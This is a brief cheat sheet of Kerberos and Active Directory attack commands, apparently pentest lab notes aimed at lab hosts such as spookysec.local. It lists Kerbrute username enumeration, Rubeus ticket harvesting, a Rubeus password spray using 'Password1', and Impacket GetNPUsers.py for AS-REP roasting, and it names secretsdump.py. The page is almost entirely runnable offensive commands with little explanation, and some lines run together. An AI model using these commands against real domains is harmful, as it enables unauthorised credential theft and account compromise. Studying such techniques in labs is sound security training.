Kerberos
Kerbrute
# Bruteforce Usernames
./kerbrute_linux_386 userenum --dc 10.10.74.225 -d spookysec.local userlist.txt Rubeus
Rubeus.exe harvest /interval:30
# Add domain name to host file
echo 10.10.24.25 CONTROLLER.local >> C:\Windows\System32\drivers\etc\hosts
# Password Spray
Rubeus.exe brute /password:Password1 /noticketImpacket
GetNPUsers.py
python3 ./GetNPUsers.py spookysec.local/ -dc-ip 10.10.74.225 -usersfile ~/Downloads/foundusers.txtSecretsdump.py
Last updated